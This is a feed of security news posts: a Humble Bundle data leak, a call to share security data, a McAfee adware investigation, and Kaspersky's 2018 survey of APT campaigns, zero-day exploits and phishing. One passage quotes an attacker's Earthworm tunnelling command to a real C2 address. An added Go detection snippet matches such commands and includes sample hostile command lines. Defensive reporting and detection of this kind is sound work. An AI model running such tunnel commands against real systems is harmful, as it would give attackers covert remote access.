  • Be careful of emails with links to unfamiliar sites. If you receive a suspicious email related to Humble Bundle, please contact us via our support website so that we can investigate further and warn others.
  • Enable Two-factor authentication (2FA) so that even if someone gets your password, they won’t be able to access your account. You can enable 2FA by following these instructions.

We sincerely apologize for this mistake. We will work even harder to ensure your privacy and safety in the future.

Good advice, but what’s the threat?

One could guess that the big risk here, then, is the potential for spear phishing. They could exploit this by sending mails to subscribers that their subscription is about to time out, or claim problems with stored card details. Throw in a splash of colour text regarding your subscription “currently being paused,” and it’s all going to look convincing.

Phishing is a major danger online, and we should do everything we can to thwart it. While the information exposed here isn’t as bad as it tends to be, it can still cause major headaches. Be on the lookout for dubious Humble mails, especially if they mention subscriptions. It’ll help to keep your bundle of joy from becoming a bundle of misery.

The post Humble Bundle alerts customers to subscription reveal bug appeared first on Malwarebytes Labs.

Achieve Community Immunity With Security Data Integration

Security is a team sport. Both threat actors and cybersecurity professionals are teaming up and collaborating in greater numbers than ever. In fact, a United Nations study found that crime rings that regularly share information drive around 80 percent of cyberattacks. The dark web has become the standard platform to share security data, as well as an effective marketplace to monetize cybercrime activities.

On the defensive side, mature security programs are developing approaches to integrate different teams. According to The New York Times, some companies are even building fusion centers where employees from a range of backgrounds — from fraud detection to forensic analysis to customer service — work together to fight threats. Motivated by the demand from customers, IBM Security built a cyber range and a mobile Cyber Tactical Operations Center (C-TOC) to help battle-test security teams with crisis simulations.

How Can Cybersecurity Professionals Foster More Collaboration?

While many organizations are using the Department of Homeland Security’s (DHS) fusion centers as a model to foster collaboration among teams, the vast majority of companies are facing a skills shortage. According to ISACA, 27 percent of U.S. enterprises are unable to fill open roles for cybersecurity professionals. Given this challenge, how can enterprises promote collaboration and, more importantly, use it to drive better security outcomes?

When considering how to prevent cybercrime, it’s critical to break down barriers to collaboration. It’s time for us to learn from each other, and not reinvent the wheel when it is already working for someone else. We must use the spirit of community to inoculate ourselves against threats and gain long-term immunity. The human race has conquered many deadly diseases, such as smallpox and polio, through community immunity — so why not bring this concept to cybersecurity?

Here are three ways to foster collaboration among teams and achieve community immunity with the help of a security data integration platform:

1. Gain a Global Perspective

We should be able to leverage insights from our peers to enrich our own decision-making. One way to do this is by using a threat score or another normalized method of sharing threat intelligence. Threat sharing should always be anonymous to protect the privacy and security of enterprises and individuals. Threat intelligence should also be specific, whether at the regional or industry level, to make it relevant and actionable.

2. Reduce Blind Spots

Threat intelligence is just one part of security. Analysts need visibility into many other areas, such as database vulnerabilities and fraud analytics. Having a single, collaborative platform to share this security data allows other analysts and researchers to build on and refine the information and, in turn, share improved data with the security community.

3. Generate Personalized Recommendations

The power of global analytics is in leveraging the learnings from a broader environment and making them relevant to us. We often see this approach in retail, where websites recommend a product based on your purchase history or user profile. In security, a recommendation engine that proactively surfaces improvements to your existing program or tips to fine-tune your deployments can be incredibly useful. In addition, as customers move toward purchasing micro-apps and services and when they need them, a recommendation engine can proactively suggest solutions so analysts can stay ahead of threats and leverage the latest innovations available to them.

Don’t Go It Alone

So, how will you build your team? If anything is certain about today’s evolving cyberthreat landscape, it’s that you can’t go it alone. By fostering relationships with peers, improving visibility into databases and vulnerabilities, and investing in systems that generate personalized recommendations, security leaders can launch a more coordinated and collaborative counterattack in the ongoing battle against cybercrime.

The post Achieve Community Immunity With Security Data Integration appeared first on Security Intelligence.

Pay-Per-Install Company Deceptively Floods Market with Unwanted Programs

For the past 18 months, McAfee Labs has been investigating a pay-per-install developer, WakeNet AB, responsible for spreading prevalent adware such as Adware-Wajam and Linkury. This developer has been active for almost 20 years and recently has used increasingly deceptive techniques to convince users to execute its installers. Our report is now available online.

During a 10-month period from September 2017 to June 2018, we observed more than 1.9 million detections in the wild and the generation of thousands of unique websites and URLs. McAfee product protections prevented millions of pieces of adware from being installed on customers’ machines.

 

McAfee Adware-InstCap detections from September 2017 to June 2018.

Some of the deceptive tactics we observed included fake movie playbacks and fake torrent downloads targeting both Windows and Mac systems. These tactics aimed to trick users into installing bundled applications such as performance cleaners.

WakeNet AB’s FileCapital tools are responsible for installing some of the most prevalent potentially unwanted program (PUP) families, which plague infected clients with unwanted advertisements and seriously impact performance.

The revenue WakeNet AB generated in one year puts it above some of the most prevalent ransomware families, which explains why creating PUPs is so appealing. PUP developers generate revenue primarily by exploiting PC users.

PUPs

A PUP is software that might offer some useful functionality to a customer but also presents some risk. Users see some PUPs as benign, others as malicious. One of the latter is Adware-Elex (aka Fireball), which infected 250 million devices. McAfee strives to protect its customers against all kinds of threats, including PUPs.

The McAfee PUP Policy helps users understand what is being installed on their systems and notifies them when a technology poses a risk to their systems or privacy. PUP detection and removal provides notification to our customers when a software program or technology lacks sufficient notification or control over the software, or fails to adequately gain user consent to the risks posed by the technology. For more on how McAfee defines and protects against PUPs, read the McAfee® Potentially Unwanted Programs Policy.

For a full analysis of WakeNet AB’s products, download the full report.

The post Pay-Per-Install Company Deceptively Floods Market with Unwanted Programs appeared first on McAfee Blogs.

Sharp rise in email and social media hacking in the UK

Police forces across the UK are coming under increasing pressure to launch criminal investigations into incidents of social media and computer hacking, according to a new report from the Parliament Street think tank. The news comes as senior Police Chiefs have warned that budget cuts and limited resources are leading to an increase in violent crime across the country. The new research paper, reveals that 14 police forces have launched a total of 2,547 investigations … More

The post Sharp rise in email and social media hacking in the UK appeared first on Help Net Security.

Kaspersky Security Bulletin 2018. Top security stories

Introduction

The internet is now woven into the fabric of our lives. Many people routinely bank, shop and socialize online and the internet is the lifeblood of commercial organizations. The dependence on technology of governments, businesses and consumers provides a broad attack surface for attackers with all kinds of motives – financial theft, theft of data, disruption, damage, reputational damage or simply ‘for the lulz’. The result is a threat landscape that ranges from highly sophisticated targeted attacks to opportunistic cybercrime. All too often, both rely on manipulating human psychology as a way of compromising entire systems or individual computers. Increasingly, the devices targeted also include those that we don’t consider to be computers – from children’s toys to security cameras. Here is our annual round-up of major incidents and key trends from 2018.

Targeted attack campaigns

At this year’s Security Analyst Summit we reported on Slingshot – a sophisticated cyber-espionage platform that has been used to target victims in the Middle East and Africa since 2012. We discovered this threat – which rivals Regin and ProjectSauron in its complexity – during an incident investigation. Slingshot uses an unusual (and, as far as we know, unique) attack vector: many of the victims were attacked by means of compromised MikroTik routers. The exact method for compromising the routers is not clear, but the attackers have found a way to add a malicious DLL to the device: this DLL is a downloader for other malicious files that are then stored on the router. When a system administrator logs in to configure the router, the router’s management software downloads and runs a malicious module on the administrator’s computer. Slingshot loads a number of modules on a compromised computer, but the two most notable are Cahnadr and GollumApp – which are, respectively, kernel mode and user mode modules. Together, they provide the functionality to maintain persistence, manage the file system, exfiltrate data and communicate with the C2 (command-and-control) server. The samples we looked at were marked as ‘version 6.x’, suggesting that the threat has existed for a considerable length of time. The time, skill and cost involved in creating Slingshot indicates that the group behind it is likely to be highly organized and professional, and probably state sponsored.

Soon after the start of the Winter Olympics in Pyeongchang, we began receiving reports of malware attacks on infrastructure related to the games. Olympic Destroyer shut down display monitors, killed Wi-Fi and took down the Olympics website – preventing visitors from printing tickets. The attack also affected other organizations in the region – for example, ski gates and ski lifts were disabled at several South Korean ski resorts. Olympic Destroyer is a network worm, the main aim of which is to wipe files from remote network shares of its victims. In the days that followed the attack, research teams and media companies around the world variously attributed the attack to Russia, China and North Korea – based on a number of features previously attributed to cyber-espionage and sabotage groups allegedly based in those countries or working for the governments of those countries. Our own researchers were also trying to understand which group was behind the attack. At one stage during our research, we discovered something that seemed to indicate that the Lazarus group was behind the attack. We found a unique trace left by the attackers that exactly matched a previously known Lazarus malware component. However, the lack of obvious motive and inconsistencies with known Lazarus TTPs (tactics, techniques and procedures) that we found during our on-site investigation at a compromised facility in South Korea led us to look again at this artefact. When we did so, we discovered that the set of features didn’t match the code – it had been forged to perfectly match the fingerprint used by Lazarus. So we concluded that the ‘fingerprint’ was a very sophisticated false flag, intentionally placed inside the malware in order to give threat hunters the impression that they had found a ‘smoking gun’ and diverting them from a more accurate attribution.


OlympicDestroyer component relations

We continued to track this APT group’s activities and noticed in June that they had started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we analysed, indicated that the attacker behind Olympic Destroyer was targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine. The earlier Olympic Destroyer attacks – designed to destroy and paralyze the infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. This suggested to us that the new activities were part of another reconnaissance stage that would be followed by a wave of destructive attacks with new motives. The variety of financial and non-financial targets could indicate that the same malware was being used by several groups with different interests. This could also be the result of cyberattack outsourcing, which is not uncommon among nation-state threat actors. However, it’s also possible that the financial targets are another false-flag operation by a threat actor that has already shown that they excel at this.

In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the Middle East and North Africa region, especially Palestine. The attacks, which started early in 2017, targeted parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others. The targeting of victims was unlike that of previous campaigns in the region (Gaza Cybergang or Desert Falcons) and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 servers. The attacks slowed down after the start of 2018, probably because the attackers achieved their objectives.

We have continued to track the activities of Crouching Yeti (aka Energetic Bear), an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing emails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC). In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017. You can read the full report here, but below is a summary of our findings.

  1. With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
  2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
  3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
  4. The diversity of victims may indicate the diversity of the attackers’ interests.
  5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.

In May, researchers from Cisco Talos published the results of their research into VPNFilter, malware used to infect different brands of router – mainly in Ukraine, although affecting routers in 54 countries in total. You can read their analysis here and here. Initially, they believed that the malware had infected around 500,000 routers – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of infected routers was much longer – 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions. However, it also spreads into networks supported by the device, thereby extending the scope of the attack. Researchers from our Global Research and Analysis Team (GReAT) took a detailed look at the C2 mechanism used by VPNFilter. One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

Sofacy is a highly active and prolific cyber-espionage group that Kaspersky Lab has been tracking for many years. In February, we published an overview of Sofacy activities in 2017, revealing a gradual move away from NATO-related targets at the start of 2017, towards targets in the Middle East, Central Asia and beyond. Sofacy uses spear-phishing and watering-hole attacks to steal information, including account credentials, sensitive communications and documents. This threat actor also makes use of zero-day vulnerabilities to deploy its malware.

Sofacy deploys different tools for different target profiles. Early in 2017 the group’s Dealer’s Choice campaign was used to target military and diplomatic organizations (mainly in NATO countries and Ukraine). Later in the year, the group used other tools from its arsenal, Zebrocy and SPLM, to target a broader range of organizations, including science and engineering centers and press services, with more of a focus on Central Asia and the Far East. Like other sophisticated threat actors, Sofacy continually develops new tools, maintains a high level of operational security and focuses on making its malware hard to detect. Once any signs of activity by an advanced threat actor such as Sofacy have been found in a network, it’s important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services such as email and VPN access. The use of APT intelligence reports, threat hunting tools such as YARA and advanced detection solutions such as KATA (Kaspersky Anti Targeted Attack Platform) will help you to understand their targeting and provide powerful ways of detecting their activities.

Our research shows that Sofacy is not the only threat actor operating in the Far East and this sometimes results in a target overlap between very different threat actors. We have seen cases where the Sofacy Zebrocy malware has competed for access to victims’ computers with the Russian-speaking Mosquito Turla clusters; and where its SPLM backdoor has competed with the traditional Turla and Chinese-speaking Danti attacks. The shared targets included government administration, technology, science and military-related organizations in or from Central Asia. The most intriguing overlap is probably that between Sofacy and the English-speaking threat actor behind the Lamberts family. The connection was discovered after researchers detected the presence of Sofacy on a server that threat intelligence had previously identified as compromised by Grey Lambert malware. The server belongs to a Chinese conglomerate that designs and manufactures aerospace and air defense technologies. However, in this case the original SPLM delivery vector remains unknown. This raises a number of hypothetical possibilities, including the fact that Sofacy could be using a new, and as yet undetected, exploit or a new strain of its backdoor, or that Sofacy somehow managed to harness Grey Lambert’s communication channels to download its malware. It could even be a false flag, planted during the previous Lambert infection. We think that the most likely answer is that an unknown new PowerShell script or legitimate but vulnerable web app was exploited to load and execute the SPLM code.

In June, we reported an ongoing campaign targeting a national data centre in Central Asia. The choice of target was especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks. We attribute this campaign to the Chinese-speaking threat actor, LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain – ‘update.iaacstudio[.]com’ – was previously used by this group and because they have previously targeted government organizations, including Central Asian ones. The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

We reported another LuckyMouse campaign in September. Since March, we had found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT. This campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (‘-s rssocks -d 103.75.190[.]28 -e 443’) creates a tunnel to a previously known LuckyMouse C2 server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor. We did not see any indications of spear-phishing or watering-hole activity, and we think that the attackers spread their infectors through networks that were already compromised.
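The Earthworm command quoted above has a recognisable argument shape (‘-s <socks mode> -d <host> -e <port>’) that can be matched in process-creation telemetry regardless of what the binary has been renamed to. The following is an added detection example, not code from the report; the sample command lines are constructed, the tunnel destination is a documentation-range placeholder rather than the real C2, and the rcsocks/ssocksd modes are included on the assumption that they are the tool’s other SOCKS modes.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// EarthwormHit describes one command line that looks like an Earthworm
// SOCKS tunnel invocation of the form "-s <mode> -d <host> -e <port>".
type EarthwormHit struct {
	Line string
	Mode string // rssocks in the campaign; rcsocks/ssocksd are the other SOCKS modes
	Dest string
	Port string
}

var (
	// rssocks runs on the compromised host and connects out (the mode seen
	// in the campaign); rcsocks is its listener side; ssocksd is a plain server.
	modeRe = regexp.MustCompile(`(?i)(?:^|\s)-s\s+(rssocks|rcsocks|ssocksd)(?:\s|$)`)
	destRe = regexp.MustCompile(`(?:^|\s)-d\s+(\S+)`)
	portRe = regexp.MustCompile(`(?:^|\s)-e\s+(\d{1,5})`)
)

// scanForEarthworm checks process-creation command lines and returns every
// match. Matching on the argument shape rather than the binary name means a
// renamed ew binary is still caught.
func scanForEarthworm(cmdlines []string) []EarthwormHit {
	var hits []EarthwormHit
	for _, line := range cmdlines {
		m := modeRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		hit := EarthwormHit{Line: strings.TrimSpace(line), Mode: strings.ToLower(m[1])}
		if d := destRe.FindStringSubmatch(line); d != nil {
			hit.Dest = d[1]
		}
		if p := portRe.FindStringSubmatch(line); p != nil {
			hit.Port = p[1]
		}
		hits = append(hits, hit)
	}
	return hits
}

// sampleCmdlines is a constructed set of process command lines. The tunnel
// destination 198.51.100.7 is a documentation-range placeholder, not the real C2.
var sampleCmdlines = []string{
	`C:\Windows\System32\svchost.exe -k netsvcs`,
	`C:\ProgramData\update.exe -s rssocks -d 198.51.100.7 -e 443`,
	`ssh -D 1080 user@jumphost.example`,
	`powershell.exe -s -d -e SQBFAFgA`, // -s/-d/-e present but no SOCKS mode: must not match
	`ew.exe -s rcsocks -l 1080 -e 8888`,
}

func main() {
	for _, h := range scanForEarthworm(sampleCmdlines) {
		fmt.Printf("mode=%s dest=%q port=%s  <- %s\n", h.Mode, h.Dest, h.Port, h.Line)
	}
}
```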

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global crypto-currency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized crypto-currency trading application that had been recommended to the company over email. An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again. It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack. The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It looks as though, in the chase after advanced targets, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms. You can read our report on Operation AppleJeus here.

Turla (aka Venomous Bear, Waterbug, and Uroboros) is best known for what was, at the time, an ultra-complex Snake rootkit focused on NATO-related targets. However, this threat actor’s activity is much broader. In October, we reported on the Turla group’s recent activities, revealing an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed. Much of our 2018 research focused on the group’s KopiLuwak JavaScript backdoor, new variants of the Carbon framework and Meterpreter delivery techniques. Other interesting aspects were the changing Mosquito delivery techniques, customized PoshSec-Mod open-source PowerShell use and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018. One interesting aspect of our research was the lack of ongoing targeting overlap with other APT activity. Turla was absent from the milestone DNC hack event – where Sofacy and CozyDuke were both present – but the group was quietly active around the globe on other projects. This provides some insight into the ongoing motivations and ambitions of the group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on. Both Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets, while WhiteAtlas and WhiteBear activity stretched across the globe to include organizations related to foreign affairs, but not all targeting has consistently followed this profile: the group also targeted scientific and technical centres, along with organizations outside the political arena. The group’s KopiLuwak activity does not necessarily focus on diplomatic and foreign affairs. Instead, 2018 activity targeted government-related scientific and energy research organizations and a government-related communications organization in Afghanistan. This highly selective but wider targeting set will probably continue into 2019.

In October, we reported the recent activity of the MuddyWater APT group. Our past telemetry indicates that this relatively new threat actor, which surfaced in 2017, has focused mainly on government targets in Iraq and Saudi Arabia. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and the activity escalated from May onwards. The new spear-phishing documents rely on social engineering to persuade the victims to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of our research, we were able not only to observe additional files and tools from the group’s arsenal but also some OPSEC mistakes made by the attackers. In order to protect against malware attacks, we would recommend the following measures:

  • Educate general staff so that they are able to identify malicious behaviour such as phishing links.
  • Educate information security staff to ensure that they have full configuration, investigative and hunting abilities.
  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as IoCs (indicators of compromise) and YARA rules.
  • Establish enterprise-grade patch management processes.

High-profile organizations should adopt elevated levels of cybersecurity, since attacks against them are inevitable and are unlikely to ever cease.

DustSquad is another threat actor that has targeted organizations in Central Asia. Kaspersky Lab has been monitoring this Russian language cyber-espionage group for the last two years, providing private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. Recently, we described a malicious program called Octopus, used by DustSquad to target diplomatic bodies in the region – the name was originally coined by ESET in 2017, after the 0ct0pus3.php script used by the actor on their old C2 servers. Using the Kaspersky Attribution Engine, based on similarity algorithms, we discovered that Octopus is related to DustSquad. In our telemetry, we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking) and in Afghanistan. In April, we discovered a new Octopus sample masquerading as Telegram Messenger with a Russian interface. We were unable to find legitimate software that this malware is impersonating – in fact, we don’t believe it exists. However, the attackers used the potential Telegram ban in Kazakhstan to push its dropper as alternative communication software for the political opposition. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

In October, we published our analysis of Dark Pulsar. Our investigation started in March 2017, when the Shadow Brokers published stolen data that included two frameworks – DanderSpritz and FuzzBunch. DanderSpritz contains various types of plugin designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they provide a very powerful platform for cyber-espionage. The leak didn’t include the Dark Pulsar backdoor itself: rather, it contained an administrative module for controlling the backdoor. However, by creating special signatures based on some magic constants in the administrative module, we were able to catch the implant itself. This implant gives the attackers remote control over compromised devices. We found 50 victims, all located in Russia, Iran and Egypt, but we believe there were probably many more. For one thing, the DanderSpritz interface is able to manage a large number of victims at the same time. In addition, the attackers often delete their malware once the campaign has ended. We think that the campaign stopped following the ‘Lost in Translation’ leak by the Shadow Brokers in April 2017. You can find our suggested mitigation strategies for complex threats such as Dark Pulsar here.

Mobile APT campaigns

The mobile APT threats segment saw three significant events: the detection of the Zoopark, BusyGasper and Skygofree cyber-espionage campaigns.

Technically, all three are well-designed and similar in their primary purpose – spying on selected victims. Their main aim is to steal all available personal data from a mobile device: interception of calls, messages, geolocation, etc. There is even a function for eavesdropping via the microphone – the smartphone is used as a ‘bug’ that doesn’t even need to be hidden from an unsuspecting target.

The cybercriminals paid particular attention to the theft of messages from popular instant messaging services, which have now largely replaced standard means of communication. In several cases, the attackers used exploits that were capable of escalating the Trojans’ local privileges on a device, opening up virtually unlimited access to remote monitoring, and often device management.

Keylogger functionality was also implemented in two of the three malicious programs, with the cybercriminals recording every keystroke on a device’s keyboard. It’s noteworthy that in order to intercept clicks the attackers didn’t even require elevated privileges.

Geographically, victims were recorded in a variety of countries: Skygofree targeted users in Italy, BusyGasper attacked individual Russian users, and Zoopark operated in the Middle East.

It’s also worth noting that there’s an increasingly prominent trend of criminals involved in espionage showing a preference for mobile platforms, because they offer a lot more personal data.

Exploits

Exploiting vulnerabilities in software and hardware remains an important means of compromising devices of all kinds.

Early this year, two severe vulnerabilities affecting Intel CPUs were reported. Dubbed Meltdown and Spectre, they allow an attacker to read memory from any process and from its own process, respectively. The vulnerabilities have been around since at least 2011. Meltdown (CVE-2017-5754) affects Intel CPUs and allows an attacker to read data from any process on the host system. While code execution is required, this can be obtained in various ways – for example, through a software bug or by visiting a malicious website that loads JavaScript code that executes the Meltdown attack. This means that all the data residing in memory (passwords, encryption keys, PINs, etc.) could be read if the vulnerability is exploited properly. Vendors were quick to publish patches for the most popular operating systems. The Microsoft update, released on January 3, was not compatible with all antivirus programs – possibly resulting in a BSoD (Blue Screen of Death) on incompatible systems. So updates could only be installed if an antivirus product had first set a specific registry key, to indicate that there were no compatibility problems. Spectre (CVE-2017-5753 and CVE-2017-5715) is slightly different. Unlike Meltdown, this attack also works on other architectures (such as AMD and ARM). Also, Spectre is only able to read the memory space of the exploited process, and not that of any process. More importantly, aside from some countermeasures in some browsers, no universal solution is readily available for Spectre. It became clear in the weeks following the reports of the vulnerabilities that they are not easily fixable. Most of the released patches have reduced the attack surface, mitigating against known ways of exploiting the vulnerabilities, but they don’t eradicate the danger completely. Since the problem is fundamental to the working of the vulnerable CPUs, it was clear that vendors would probably have to grapple with new exploits for years to come. In fact, it didn’t take years. In July, Intel paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant one (CVE-2017-5753). Spectre 1.1 (CVE-2018-3693) can be used to create speculative buffer overflows. Spectre 1.2 allows an attacker to overwrite read-only data and code pointers to breach sandboxes on CPUs that don’t enforce read-write protections. These new vulnerabilities were uncovered by MIT researcher Vladimir Kiriansky and independent researcher Carl Waldspurger.

On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents. It turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) – patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability. The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode. Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document). To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In August, our AEP (Automatic Exploit Prevention) technology detected a new kind of cyberattack that tried to use a zero-day vulnerability in the Windows driver file, ‘win32k.sys’. We informed Microsoft about the issue and on October 9 Microsoft disclosed the vulnerability (CVE-2018-8453) and published an update. This is a very dangerous vulnerability, giving attackers control over a compromised computer. The vulnerability was used in a highly targeted attack campaign on organizations in the Middle East – we found fewer than a dozen victims. We believe that these attacks were carried out by the FruityArmor threat actor.

In late October we reported another vulnerability to Microsoft, this time a zero-day elevation of privilege vulnerability in ‘win32k.sys’ – which can be used by an attacker to obtain the privileges necessary for persistence on a victim’s system. This vulnerability has also been exploited in a very limited number of attacks on organizations in the Middle East. Microsoft published an update for this vulnerability (CVE-2018-8589) on November 13. This threat was also detected by means of our proactive technologies – the advanced sandboxing and anti-malware engine for the Kaspersky Anti Targeted Attack Platform and our AEP technology.

Browser extensions – extending the reach of cybercriminals

Browser extensions can make our lives easier, hiding obtrusive advertising, translating text, helping us choose the goods we want in online stores and more. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. There are also extensions designed to steal money. Earlier this year, one of these caught our eye because it communicated with a suspicious domain. The malicious extension, named Desbloquear Conteúdo (‘Unblock Content’ in Portuguese), targeted customers of Brazilian online banking services, harvesting logins and passwords in order to obtain access to victims’ bank accounts.

In September, hackers published the private messages from at least 81,000 Facebook accounts, claiming that this was just a small fraction of a much larger haul comprising 120 million accounts. In a Dark Web advert, the attackers offered the messages for 10 cents per account. The attack was investigated by the BBC Russian Service and cybersecurity company Digital Shadows. They found that of 81,000 accounts, most were from Ukraine and Russia, although accounts from other countries were also among them, including the UK, the US and Brazil. Facebook suggested that the messages were stolen using a malicious browser extension.

Malicious extensions are quite rare, but we need to take them seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

The World Cup of fraud

Social engineering remains an important tool in the arsenal of cyberattackers of all kinds. Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events; and the FIFA World Cup is no different. Long before the event kicked off, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes. These phishing messages included notifications of a fake lottery win, or a message offering tickets to one of the matches. Fraudsters often go to great lengths to mimic legitimate partner sites, creating well-designed pages and even including SSL certificates for added credibility. The criminals also extract data by mimicking official FIFA notifications: the victim receives a message telling them that the security system has been updated and all personal data must be re-entered to avoid lockout. These messages contain a link to a fake page where the scammers harvest the victim’s personal information.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We also provided tips on how to avoid phishing scams – advice that holds true for any phishing scams, not just for those related to the World Cup.

